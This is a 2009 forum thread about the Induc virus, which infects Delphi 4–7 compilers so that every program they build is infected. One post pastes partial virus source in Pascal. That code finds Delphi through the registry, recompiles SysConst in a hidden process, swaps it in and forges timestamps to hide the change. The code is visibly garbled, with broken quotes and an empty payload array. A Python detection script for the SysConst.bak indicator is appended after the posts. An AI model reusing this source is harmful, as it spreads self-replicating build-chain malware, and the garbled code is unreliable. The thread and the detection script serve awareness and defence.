all Delphi 4, 5, 6 and 7 have "Virus.Win32.Induc.a"

Discussion in 'Application Software' started by pingu, Aug 18, 2009.

  1. pingu

    pingu Guest

    Check SysConst.dcu

    Anti-virus software vendors Gdata, Avira, McAfee and Kaspersky have discovered a new type of virus which infects and compromises systems running the Delphi development environment. After infection, all Delphi programs compiled using the infected Delphi environment are also infected. Anti-virus laboratory AV-Test has already spotted the first examples in the wild.

    The virus affects Delphi versions 4.0, 5.0, 6.0 and 7.0. After making a backup which it names SysConst.bak, it overwrites the Delphi file SysConst.dcu with a self-compiled version. Since the infected file is loaded whenever Delphi programs are compiled, all programs generated after this point will be infected as "Virus.Win32.Induc.a". McAfee reports infected files as "W32/Induc" or "Generic!Artemis". Other anti-virus vendors have been informed of the virus and are working on updates.
     
  2. Maniaslayer9

    Maniaslayer9 MDL Novice

    #2 Maniaslayer9, Aug 19, 2009
    Last edited by a moderator: Aug 23, 2009
    wow

    o shoot
    omg dude u posted this 1 day ago...and today...i turned on my computer....and my Microsoft Security Essentials showed a message saying i was infected by a severe virus
    i clicked on it and it came from that game boosting software...."Game Booster"
    from iolo software....wtf....i mean...isn't iolo like trusted? and thats what infected my computer...
    luckily my antivirus cleaned it and i am no longer infected
     
  3. pingu

    pingu Guest

    #3 pingu, Aug 19, 2009
    Last edited by a moderator: Apr 20, 2017
    (OP)
    Here’s something you don’t see every day
    - a virus that infects Delphi files … at compile-time.
    - some of the found virus code from slippppppppp - look here:

    Code:
    uses windows; 
     var sc:array[1..24] of string=( 
    function x(s:string):string; 
    var i:integer; 
    begin for i:=1 to length(s) do 
    if s" =#36 then 
    s:=#39; 
    result:=s; 
    end; 
    
    procedure re(s,d,e:string); 
    var f1,f2:textfile; 
    h:cardinal; 
    f:STARTUPINFO; 
    p:PROCESS_INFORMATION; 
    b:boolean; 
    t1,t2,t3:FILETIME; 
    begin 
    h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0); 
    if h<>DWORD(-1) then begin 
    CloseHandle(h); 
    exit; 
    end; 
    {$I-}assignfile(f1,s); 
    reset(f1); 
    if ioresult<>0 then exit;assignfile" 
    (f2,d+$pas$); 
    rewrite(f2); 
    if ioresult<>0 then begin 
    closefile(f1); 
    exit; 
    end; 
    while 
    not eof(f1) do begin 
    readln(f1,s); 
    writeln(f2,s);  
    if pos($implementation$,s)<>0 then break; 
    end; 
    
    for h:= 1 to 1 do writeln(f2,sc[h]); 
    for h:= 1 to 23 do writeln(f2,$$$$+sc[h],$$$,$); 
    writeln(f2,$$$$+sc[24]+$$$);$); 
    for h:= 2 to 24 do writeln(f2, x(sc[h])); 
    closefile(f1); 
    closefile(f2); 
    {$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$)); 
    fillchar(f,sizeof(f),0); f.cb:=sizeof(f); 
    f.dwFlags:=STARTF_USESHOWWINDOW; 
    f.wShowWindow:=SW_HIDE; 
    b:=CreateProcess(nil,pchar(e+$""$+d+$pas""$),0,0,false,0,0,0,"f,p); 
    if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$), pchar(d+$dcu$)); 
    DeleteFile(pchar(d+$pas$)); 
    h:=CreateFile(pchar(d+$bak$),0,0,0,3,"0,0); 
    if  h=DWORD(-1) then exit; 
    GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); 
    h:= CreateFile(pchar(d+$dcu$),256,0,0,3,0,0); 
    if h=DWORD(-1) then exit; 
    SetFileTime(h,@t1,@t2,@t3); 
    CloseHandle(h); 
    end; 
    
    procedure st; 
    var  k:HKEY; 
    c:array [1..255] of char; 
    i:cardinal; r:string; v:char; 
    begin for v:=$4$ to $7$ do 
    if RegOpenKeyEx( HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then 
    begin i:=255;i 
    if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin 
     r:=$$; 
    i:= 1; 
     while c<>#0 do begin 
    r:=r+c;inc(i); 
    end; 
    re(r+$\source\rtl\sys\SysConst$+$.pas$,r+$\lib\sysconst.$,$$+r+$\bin\dcc32.exe"" $); 
    end; 
    RegCloseKey(k); 
    end; 
    end;" 
    
    //main code 
    begin st; end."
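
A defensive check for the indicator described in this thread, added here as an example and not part of the original posts: it looks in each Delphi `lib` directory for a `SysConst.bak` sitting next to `SysConst.dcu`. The function names, the result fields and the use of the 32-bit registry view are assumptions of this example.

```python
import sys
from pathlib import Path

VERSIONS = ("4", "5", "6", "7")  # Delphi versions named in the thread
NAMES = ("sysconst.dcu", "sysconst.bak")


def delphi_roots():
    """Read RootDir for each Delphi version from the registry (Windows only)."""
    if sys.platform != "win32":
        return []
    import winreg
    roots = []
    # Assumption: Delphi 4-7 are 32-bit, so read the 32-bit registry view.
    access = winreg.KEY_READ | winreg.KEY_WOW64_32KEY
    for v in VERSIONS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                                rf"Software\Borland\Delphi\{v}.0", 0, access) as key:
                roots.append(Path(winreg.QueryValueEx(key, "RootDir")[0]))
        except OSError:
            continue  # this version is not installed
    return roots


def check_root(root):
    """Inspect one install; 'suspect' means a SysConst.bak sits in lib."""
    lib = Path(root) / "lib"
    found = {}
    if lib.is_dir():
        for entry in lib.iterdir():  # match names case-insensitively
            if entry.name.lower() in NAMES:
                found[entry.name.lower()] = entry
    bak, dcu = found.get("sysconst.bak"), found.get("sysconst.dcu")
    result = {"root": str(root), "suspect": bak is not None,
              "same_mtime": False, "size_differs": False}
    if bak and dcu:
        b, d = bak.stat(), dcu.stat()
        # The posted code copies the backup's timestamps onto the replaced
        # .dcu, so equal mtimes do not show that the .dcu is untouched.
        result["same_mtime"] = int(b.st_mtime) == int(d.st_mtime)
        result["size_differs"] = b.st_size != d.st_size
    return result


if __name__ == "__main__":
    for r in delphi_roots():
        print(check_root(r))
```

Run it on the build machine; `check_root` can also be pointed at a Delphi directory copied from a disk image.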